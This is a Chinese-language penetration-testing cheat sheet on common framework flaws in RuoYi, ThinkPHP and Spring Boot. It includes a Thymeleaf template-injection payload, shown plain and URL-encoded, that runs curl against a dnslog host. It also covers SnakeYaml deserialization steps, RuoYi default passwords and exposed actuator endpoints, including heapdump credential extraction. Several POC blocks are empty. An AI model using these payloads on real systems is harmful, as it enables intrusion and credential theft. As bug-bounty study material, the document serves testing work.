【SRC】常见框架漏洞
【SRC】常见框架漏洞
hihopkc若依框架
页面展示
Shiro反序列化
SQL注入(需要登录)
漏洞点为系统管理中的角色管理的搜索功能,发现注入点参数为:params[dataScope]
1 | POC: |
Thymeleaf模板注入(需要登录)
给payload编码一下,选URL编码:
1 | ${T (java.lang.Runtime).getRuntime().exec("curl xxxx.dnslog.cn")} |
登录系统,需要添加cookie访问
1 | http://192.168.0.2/monitor/cache/getNames?fragment=header(%24%7b%54%20%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%75%72%6c%20%78%78%78%78%2e%64%6e%73%6c%6f%67%2e%63%6e%22%29%7d%0a) |
SnakeYaml 反序列化(需要登录)
1 | Poc: |
yaml-payload下载地址:https://github.com/artsploit/yaml-payload/
修改AwesomeScriptEngineFactory.java
1 | javac src/artsploit/AwesomeScriptEngineFactory.java //会生成一个AwesomeScriptEngineFactory.class文件 |
Swagger未授权
若依系统内置了swagger,所以会有可能有未授权访问未授权访问路径常见的有/swagger-ui.html,/prod-api/swagger-ui.html,/api/swagger-ui.html等,配合目录扫描工具效果更佳。
druid未授权
若依系统内置了Druid,所以会有可能有未授权访问或者弱口令,未授权访问路径常见的有 /druid/,/prod-api/druid/,/api/druid/等,这是常见的,也可以直接扫一波,弱口令就是 ruoyi/123456 或者 admin/123456
thinkphp框架
页面展示
命令执行
日志泄露
Springboot框架
页面展示
Spring Boot < 1.5: 默认未授权访问所有端点。
Spring Boot >= 1.5: 默认只允许访问/health和/info端点,但是此安全性通常被应用程序开发人员禁用。
1 | /auditevents 显示当前应用程序的审计事件信息 |
未授权
访问/actuator (没什么用)
如果网站设置了management.endpoints.web.exposure.include为*,那么我们可以在/actuator看到所有存在的断点:
访问/actuator/version
泄露版本信息
访问/env或者/actuator/env
获取环境属性
其中redis账户和信息泄露
访问/actuator/metrics
获得每个度量的名称,其中主要监控了JVM内容使用、GC情况、类加载信息等
如果想要得到每个度量的详细信息,
你需要传递度量的名称到URL中,
比如这样:
http://x.x.x.x/actuator/metrics/http.server.requests
访问/actuator/prometheus
获取一些监控指标:
访问网站的/actuator/heapdump接口
下载返回的GZip 压缩 堆转储文件,使用通过VisualVM/Android studio 加载,通过泄露站点的内存信息,查看到后台账号信息和数据库账号
工具下载:https://github.com/wyzxxz/heapdump_tool
推荐文章
若依:https://www.cnblogs.com/mastersir/p/16260399.html
若依:https://blog.csdn.net/qq_44029310/article/details/125296406
Spingboot:https://www.freebuf.com/vuls/289710.html
Thinkphp:https://blog.csdn.net/qq_32171761/article/details/110115207